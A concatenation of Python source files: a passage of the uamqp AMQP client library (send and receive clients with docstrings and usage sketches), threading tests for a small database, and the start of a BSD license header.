may have an existing CBS authentication Session, which will be
used for this client as well. Otherwise a new Session will be
created.
:param connection: An existing Connection that may be shared between
multiple clients.
        :type connection: ~uamqp.connection.Connection
"""
# pylint: disable=protected-access
if self._session:
return # already open.
_logger.debug("Opening client connection.")
try:
if connection:
_logger.debug("Using existing connection.")
self._auth = connection.auth
self._ext_connection = True
connection.lock()
self._connection = connection or self.connection_type(
self._hostname,
self._auth,
container_id=self._name,
max_frame_size=self._max_frame_size,
channel_max=self._channel_max,
idle_timeout=self._idle_timeout,
properties=self._properties,
remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
error_policy=self._error_policy,
debug=self._debug_trace,
encoding=self._encoding)
self._build_session()
if self._keep_alive_interval:
self._keep_alive_thread = threading.Thread(target=self._keep_alive)
self._keep_alive_thread.start()
finally:
if self._ext_connection:
connection.release()
def close(self):
"""Close the client. This includes closing the Session
and CBS authentication layer as well as the Connection.
If the client was opened using an external Connection,
this will be left intact.
No further messages can be sent or received and the client
cannot be re-opened.
All pending, unsent messages will remain uncleared to allow
them to be inspected and queued to a new client.
"""
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = True
if self._keep_alive_thread:
self._keep_alive_thread.join()
self._keep_alive_thread = None
if not self._session:
return # already closed.
if not self._cbs:
_logger.debug("Closing non-CBS session.")
self._session.destroy()
else:
_logger.debug("CBS close authenticator.")
self._auth.close_authenticator()
self._cbs = None
self._session = None
if not self._ext_connection:
_logger.debug("Closing exclusive connection.")
self._connection.destroy()
else:
_logger.debug("Shared connection remaining open.")
self._connection = None
def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
"""Run a request/response operation. These are frequently used for management
tasks against a $management node, however any node name can be specified
and the available options will depend on the target service.
:param message: The message to send in the management request.
:type message: ~uamqp.message.Message
:param operation: The type of operation to be performed. This value will
be service-specific, but common values include READ, CREATE and UPDATE.
This value will be added as an application property on the message.
:type operation: bytes
:param op_type: The type on which to carry out the operation. This will
be specific to the entities of the service. This value will be added as
an application property on the message.
:type op_type: bytes
:param node: The target node. Default is `b"$management"`.
:type node: bytes
:param timeout: Provide an optional timeout in milliseconds within which a response
to the management request must be received.
:type timeout: float
:param callback: The function to process the returned parameters of the management
request including status code and a description if available. This can be used
to reformat the response or raise an error based on content. The function must
take 3 arguments - status code, response message and description.
:type callback: ~callable[int, bytes, ~uamqp.message.Message]
:param status_code_field: Provide an alternate name for the status code in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusCode"`.
:type status_code_field: bytes
:param description_fields: Provide an alternate name for the description in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusDescription"`.
:type description_fields: bytes
:rtype: ~uamqp.message.Message
"""
while not self.auth_complete():
time.sleep(0.05)
response = self._session.mgmt_request(
message,
operation,
op_type=op_type,
node=node,
callback=callback,
encoding=self._encoding,
debug=self._debug_trace,
**kwargs)
return response
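    # Illustrative sketch (not part of the original module): a management READ request
    # against the default b"$management" node. The op_type value below is a
    # service-specific assumption.
    #
    #     response = client.mgmt_request(
    #         request_message, operation=b'READ', op_type=b'com.example:entity')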
def auth_complete(self):
"""Whether the authentication handshake is complete during
connection initialization.
:rtype: bool
"""
timeout = False
auth_in_progress = False
if self._cbs:
timeout, auth_in_progress = self._auth.handle_token()
if timeout is None and auth_in_progress is None:
_logger.debug("No work done.")
return False
if timeout:
raise compat.TimeoutException("Authorization timeout.")
if auth_in_progress:
self._connection.work()
return False
return True
def client_ready(self):
"""
Whether the handler has completed all start up processes such as
establishing the connection, session, link and authentication, and
        is now ready to process messages.
:rtype: bool
"""
if not self.auth_complete():
return False
if not self._client_ready():
self._connection.work()
return False
return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
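# Illustrative usage sketch (not part of the original module). The endpoint URI, hostname
# and credentials below are assumptions; auth can be any ~uamqp.authentication.AMQPAuth
# subclass.
#
#     auth = authentication.SASLPlain('myhost.example.com', 'user', 'password')
#     with AMQPClient('amqps://myhost.example.com/myentity', auth=auth) as client:
#         while client.do_work():   # one connection iteration per call
#             pass                   # application-specific work goes here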
class SendClient(AMQPClient):
"""An AMQP client for sending messages.
:param target: The target AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Target object.
:type target: str, bytes or ~uamqp.address.Target
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
     If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param msg_timeout: A timeout in milliseconds for messages from when they have been
added to the send queue to when the message is actually sent. This prevents potentially
expired data from being sent. If set to 0, messages will not expire. Default is 0.
:type msg_timeout: int
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param link_credit: The sender Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
:type link_credit: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
error_policy=None, keep_alive_interval=None, **kwargs):
target = target if isinstance(target, address.Address) else address.Target(target)
self._msg_timeout = msg_timeout
self._pending_messages = []
        self._waiting_messages = 0  # count of messages awaiting a send acknowledgement
self._shutdown = None
# Sender and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._link_properties = kwargs.pop('link_properties', None)
self._link_credit = kwargs.pop('link_credit', None)
# AMQP object settings
self.sender_type = sender.MessageSender
super(SendClient, self).__init__(
target,
auth=auth,
client_name=client_name,
debug=debug,
error_policy=error_policy,
keep_alive_interval=keep_alive_interval,
**kwargs)
def _client_ready(self):
"""Determine whether the client is ready to start sending messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageSender must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageSender
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.sender_type(
self._session, self._name, self._remote_address,
name='sender-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
send_settle_mode=self._send_settle_mode,
receive_settle_mode=self._receive_settle_mode,
max_message_size=self._max_message_size,
link_credit=self._link_credit,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageSenderState.Error:
raise errors.MessageHandlerError(
"Message Sender Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageSenderState.Open:
return False
return True
def _on_message_sent(self, message, result, delivery_state=None):
"""Callback run on a message send operation. If message
has a user defined callback, it will be called here. If the result
of the operation is failure, the message state will be reverted
to 'pending' up to the maximum retry count.
:param message: The message that was sent.
:type message: ~uamqp.message.Message
:param result: The result of the send operation.
:type result: int
        :param delivery_state: The returned delivery state, or an Exception if an error
         occurred during the send operation.
        :type delivery_state: ~Exception
"""
# pylint: disable=protected-access
try:
exception = delivery_state
result = constants.MessageSendResult(result)
if result == constants.MessageSendResult.Error:
if isinstance(delivery_state, Exception):
exception = errors.ClientMessageError(delivery_state, info=delivery_state)
exception.action = errors.ErrorAction(retry=True)
elif delivery_state:
error = errors.ErrorResponse(delivery_state)
exception = errors._process_send_error(
self._error_policy,
error.condition,
error.description,
error.info)
else:
exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
exception.action = errors.ErrorAction(retry=True)
if exception.action.retry == errors.ErrorAction.retry \
and message.retries < self._error_policy.max_retries:
if exception.action.increment_retries:
message.retries += 1
self._backoff = exception.action.backoff
_logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
message.state = constants.MessageState.WaitingToBeSent
return
if exception.action.retry == errors.ErrorAction.retry:
_logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
else:
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
else:
_logger.debug("Message sent: %r, %r", result, exception)
message.state = constants.MessageState.SendComplete
message._response = errors.MessageAlreadySettled()
if message.on_send_complete:
message.on_send_complete(result, exception)
except KeyboardInterrupt:
_logger.error("Received shutdown signal while processing message send completion.")
self.message_handler._error = errors.AMQPClientShutdown()
def _get_msg_timeout(self, message):
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - message.idle_time)
if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
return None
return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0
def _transfer_message(self, message, timeout):
sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
if not sent:
_logger.info("Message not sent, raising RuntimeError.")
raise RuntimeError("Message sender failed to add message data to outgoing queue.")
def _filter_pending(self):
filtered = []
for message in self._pending_messages:
if message.state in constants.DONE_STATES:
continue
elif message.state == constants.MessageState.WaitingForSendAck:
self._waiting_messages += 1
elif message.state == constants.MessageState.WaitingToBeSent:
message.state = constants.MessageState.WaitingForSendAck
try:
timeout = self._get_msg_timeout(message)
if timeout is None:
self._on_message_sent(message, constants.MessageSendResult.Timeout)
if message.state != constants.MessageState.WaitingToBeSent:
continue
else:
self._transfer_message(message, timeout)
except Exception as exp: # pylint: disable=broad-except
self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
if message.state != constants.MessageState.WaitingToBeSent:
continue
filtered.append(message)
return filtered
def _client_run(self):
"""MessageSender Link is now open - perform message send
on all pending messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
# pylint: disable=protected-access
self.message_handler.work()
self._waiting_messages = 0
self._pending_messages = self._filter_pending()
if self._backoff and not self._waiting_messages:
_logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
self._connection.sleep(self._backoff)
self._backoff = 0
self._connection.work()
return True
@property
def _message_sender(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
@property
def pending_messages(self):
return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._pending_messages = []
self._remote_address = address.Target(redirect.address)
self._redirect(redirect, auth)
def queue_message(self, *messages):
"""Add one or more messages to the send queue.
No further action will be taken until either `SendClient.wait()`
or `SendClient.send_all_messages()` has been called.
The client does not need to be open yet for messages to be added
to the queue. Multiple messages can be queued at once:
- `send_client.queue_message(my_message)`
- `send_client.queue_message(message_1, message_2, message_3)`
- `send_client.queue_message(*my_message_list)`
        :param messages: One or more messages to queue. Each can either be a single
         instance of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
        :type messages: ~uamqp.message.Message
"""
for message in messages:
for internal_message in message.gather():
internal_message.idle_time = self._counter.get_current_ms()
internal_message.state = constants.MessageState.WaitingToBeSent
self._pending_messages.append(internal_message)
def send_message(self, messages, close_on_done=False):
"""Send a single message or batched message.
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
        :type messages: ~uamqp.message.Message
:param close_on_done: Close the client once the message is sent. Default is `False`.
:type close_on_done: bool
:raises: ~uamqp.errors.MessageException if message fails to send after retry policy
is exhausted.
"""
batch = messages.gather()
pending_batch = []
for message in batch:
message.idle_time = self._counter.get_current_ms()
self._pending_messages.append(message)
pending_batch.append(message)
self.open()
running = True
try:
while running and any([m for m in pending_batch if m.state not in constants.DONE_STATES]):
running = self.do_work()
failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
if any(failed):
details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
details['failed_messages'] = {}
exception = None
for failed_message in failed:
exception = failed_message._response # pylint: disable=protected-access
details['failed_messages'][failed_message] = exception
raise errors.ClientMessageError(exception, info=details)
finally:
if close_on_done or not running:
self.close()
def messages_pending(self):
"""Check whether the client is holding any unsent
messages in the queue.
:rtype: bool
"""
return bool(self._pending_messages)
def wait(self):
"""Run the client until all pending message in the queue
have been processed. Returns whether the client is still running after the
messages have been processed, or whether a shutdown has been initiated.
:rtype: bool
"""
running = True
while running and self.messages_pending():
running = self.do_work()
return running
def send_all_messages(self, close_on_done=True):
"""Send all pending messages in the queue. This will return a list
of the send result of all the pending messages so it can be
determined if any messages failed to send.
This function will open the client if it is not already open.
:param close_on_done: Close the client once the messages are sent.
Default is `True`.
:type close_on_done: bool
:rtype: list[~uamqp.constants.MessageState]
"""
self.open()
running = True
try:
messages = self._pending_messages[:]
running = self.wait()
results = [m.state for m in messages]
return results
finally:
if close_on_done or not running:
self.close()
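# --- Illustrative usage sketch (not executed on import) -----------------------
# A minimal sketch of the queue-and-send workflow described in the SendClient
# docstrings above. The endpoint URI is hypothetical; real services normally
# also require an auth object from uamqp.authentication instead of the default
# SASLAnonymous.
def _example_send_usage():
    from uamqp import Message
    send_client = SendClient("amqps://my-namespace.example.com/my-queue")
    # Messages can be queued before the client is opened; nothing is
    # transferred until wait() or send_all_messages() is called.
    send_client.queue_message(Message(body=b"first"), Message(body=b"second"))
    # send_all_messages() opens the client, drains the queue and returns the
    # final MessageState of every queued message.
    return send_client.send_all_messages(close_on_done=True)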
class ReceiveClient(AMQPClient):
"""An AMQP client for receiving messages.
    :param source: The source AMQP service endpoint. This can either be the URI as
     a string or a ~uamqp.address.Source object.
    :type source: str, bytes or ~uamqp.address.Source
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
     If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param timeout: A timeout in milliseconds. The receiver will shut down if no
new messages are received after the specified timeout. If set to 0, the receiver
will never timeout and will continue to listen. The default is 0.
:type timeout: float
:param auto_complete: Whether to automatically settle message received via callback
or via iterator. If the message has not been explicitly settled after processing
the message will be accepted. Alternatively, when used with batch receive, this setting
will determine whether the messages are pre-emptively settled during batching, or otherwise
     left to the user to be explicitly settled.
:type auto_complete: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
     To create a desired_capabilities object, do the following:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param prefetch: The receiver Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
The default is 300.
:type prefetch: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
     Default is 'UTF-8'.
:type encoding: str
"""
def __init__(
self, source, auth=None, client_name=None, debug=False, timeout=0,
auto_complete=True, error_policy=None, **kwargs):
source = source if isinstance(source, address.Address) else address.Source(source)
self._timeout = timeout
self._last_activity_timestamp = None
self._was_message_received = False
self._message_received_callback = None
self._streaming_receive = False
self._received_messages = compat.queue.Queue()
# Receiver and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._prefetch = kwargs.pop('prefetch', None) or 300
self._link_properties = kwargs.pop('link_properties', None)
# AMQP object settings
self.receiver_type = receiver.MessageReceiver
self.auto_complete = auto_complete
super(ReceiveClient, self).__init__(
source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)
@property
def _message_receiver(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
def _client_ready(self):
"""Determine whether the client is ready to start receiving messages.
        To be ready, the connection must be open and authentication complete.
The Session, Link and MessageReceiver must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.receiver_type(
self._session, self._remote_address, self._name,
on_message_received=self._message_received,
name='receiver-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
receive_settle_mode=self._receive_settle_mode,
send_settle_mode=self._send_settle_mode,
prefetch=self._prefetch,
max_message_size=self._max_message_size,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageReceiverState.Error:
raise errors.MessageHandlerError(
"Message Receiver Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageReceiverState.Open:
self._last_activity_timestamp = self._counter.get_current_ms()
return False
return True
def _client_run(self):
"""MessageReceiver Link is now open - start receiving messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
self.message_handler.work()
self._connection.work()
now = self._counter.get_current_ms()
if self._last_activity_timestamp and not self._was_message_received:
# If no messages are coming through, back off a little to keep CPU use low.
time.sleep(0.05)
if self._timeout > 0:
timespan = now - self._last_activity_timestamp
if timespan >= self._timeout:
_logger.info("Timeout reached, closing receiver.")
self._shutdown = True
else:
self._last_activity_timestamp = now
self._was_message_received = False
return True
def _complete_message(self, message, auto): # pylint: disable=no-self-use
if not message or not auto:
return
message.accept()
def _message_generator(self):
"""Iterate over processed messages in the receive queue.
:rtype: generator[~uamqp.message.Message]
"""
self.open()
auto_complete = self.auto_complete
self.auto_complete = False
receiving = True
message = None
try:
while receiving:
while receiving and self._received_messages.empty():
receiving = self.do_work()
while not self._received_messages.empty():
message = self._received_messages.get()
self._received_messages.task_done()
yield message
self._complete_message(message, auto_complete)
finally:
self._complete_message(message, auto_complete)
self.auto_complete = auto_complete
self.close()
def _message_received(self, message):
"""Callback run on receipt of every message. If there is
a user-defined callback, this will be called.
Additionally if the client is retrieving messages for a batch
or iterator, the message will be added to an internal queue.
:param message: Received message.
:type message: ~uamqp.message.Message
"""
self._was_message_received = True
if self._message_received_callback:
self._message_received_callback(message)
self._complete_message(message, self.auto_complete)
if not self._streaming_receive:
self._received_messages.put(message)
elif not message.settled:
# Message was received with callback processing and wasn't settled.
_logger.info("Message was not settled.")
def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
"""Receive a batch of messages. Messages returned in the batch have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback. This method will return as soon as some messages are
available rather than waiting to achieve a specific batch size, and therefore the
number of messages returned per call will vary up to the maximum allowed.
If the receive client is configured with `auto_complete=True` then the messages received
in the batch returned by this function will already be settled. Alternatively, if
`auto_complete=False`, then each message will need to be explicitly settled before
it expires and is released.
:param max_batch_size: The maximum number of messages that can be returned in
one call. This value cannot be larger than the prefetch value, and if not specified,
the prefetch value will be used.
:type max_batch_size: int
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
        :param timeout: A timeout in milliseconds for which to wait to receive any messages.
If no messages are received in this time, an empty list will be returned. If set to
0, the client will continue to wait until at least one message is received. The
default is 0.
:type timeout: float
"""
self._message_received_callback = on_message_received
max_batch_size = max_batch_size or self._prefetch
if max_batch_size > self._prefetch:
raise ValueError(
'Maximum batch size cannot be greater than the '
'connection link credit: {}'.format(self._prefetch))
timeout = self._counter.get_current_ms() + timeout if timeout else 0
expired = False
self.open()
receiving = True
batch = []
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
if len(batch) >= max_batch_size:
return batch
while receiving and not expired and len(batch) < max_batch_size:
while receiving and self._received_messages.qsize() < max_batch_size:
if timeout and self._counter.get_current_ms() > timeout:
expired = True
break
before = self._received_messages.qsize()
receiving = self.do_work()
received = self._received_messages.qsize() - before
if self._received_messages.qsize() > 0 and received == 0:
# No new messages arrived, but we have some - so return what we have.
expired = True
break
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
return batch
def receive_messages(self, on_message_received):
"""Receive messages. This function will run indefinitely, until the client
closes either via timeout, error or forced interruption (e.g. keyboard interrupt).
        If the receive client is configured with `auto_complete=True` then any message
        that has not been settled by the time the provided callback completes will
        automatically be accepted, provided it has not expired. If an error occurs or
        the message has expired, it will be released. Alternatively, if `auto_complete=False`, each message will need
to be explicitly settled during the callback, otherwise it will be released.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._streaming_receive = True
self.open()
self._message_received_callback = on_message_received
receiving = True
try:
while receiving:
receiving = self.do_work()
except:
receiving = False
raise
finally:
self._streaming_receive = False
if not receiving:
self.close()
def receive_messages_iter(self, on_message_received=None):
"""Receive messages by generator. Messages returned in the generator have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._message_received_callback = on_message_received
return self._message_generator()
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = False
self._last_activity_timestamp = None
self._was_message_received = False
self._received_messages = compat.queue.Queue()
self._remote_address = address.Source(redirect.address)
self._redirect(redirect, auth)
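# --- Illustrative usage sketch (not executed on import) -----------------------
# A minimal sketch of the two receive patterns described in the ReceiveClient
# docstrings above: batch receive and iterator receive. The source URI is
# hypothetical; real services normally also require an auth object from
# uamqp.authentication.
def _example_receive_usage():
    receive_client = ReceiveClient(
        "amqps://my-namespace.example.com/my-queue",
        auto_complete=True,   # received messages are settled automatically
        timeout=5000)         # shut down after 5 seconds of inactivity
    # Batch receive returns as soon as messages are available, up to max_batch_size.
    batch = receive_client.receive_message_batch(max_batch_size=10)
    # Iterator receive yields messages as they arrive until the timeout fires;
    # the generator closes the client when it is exhausted.
    for message in receive_client.receive_messages_iter():
        print(message.get_data())
    return batch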
|
concurrency_tests.py
|
import engine.db_structure as db_py
import threading
import os
filename = "concurrency.vdb"
if os.path.isfile(filename):
os.remove(filename)
db = db_py.Database(False, filename)
db.create_table("vadik_table", {"zhenya1": "int", "zhenya2": "str"})
def test_multithreading_insert():
def insert_func():
for i in range(10):
db.tables[0].insert(["zhenya1", "zhenya2"], [99, "test_string_123"])
thread1 = threading.Thread(target=insert_func)
thread2 = threading.Thread(target=insert_func)
thread1.start()
thread1.join()
thread2.start()
thread2.join()
assert db.tables[0].count_rows() == 20
def test_repeatable_read():
def func():
id = db.tables[0].start_transaction()
db.tables[0].update(["zhenya2"], [["TEST"]], [db.tables[0].get_row_by_id(1)], id)
db.tables[0].end_transaction(id)
id = db.tables[0].start_transaction()
selected_rows_one = db.tables[0].select(["zhenya2"], db.tables[0].get_row_by_id(1), id)
selected_value_one = selected_rows_one[0].fields_values_dict["zhenya2"]
thread = threading.Thread(target=func)
thread.start()
thread.join()
selected_rows_two = db.tables[0].select(["zhenya2"], db.tables[0].get_row_by_id(1), id)
selected_value_two = selected_rows_two[0].fields_values_dict["zhenya2"]
db.tables[0].end_transaction(id)
assert selected_value_one == selected_value_two
def test_multithreading_update():
def update_func_n(n):
def update_func():
db.tables[0].update(["zhenya1"], [[n]], [db.tables[0].get_row_by_id(4)])
return update_func
threads = []
for i in range(200):
func = update_func_n(i)
threads.append(threading.Thread(target=func))
for thread in threads:
thread.start()
thread.join()
assert db.tables[0].get_row_by_id(4).fields_values_dict["zhenya1"] == 199
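# A minimal standalone runner sketch: the functions above are written as pytest
# tests, but they can also be called directly in order, since they share the
# module-level database created at import time.
if __name__ == "__main__":
    test_multithreading_insert()
    test_repeatable_read()
    test_multithreading_update()
    print("all concurrency checks passed")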
|
bag.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
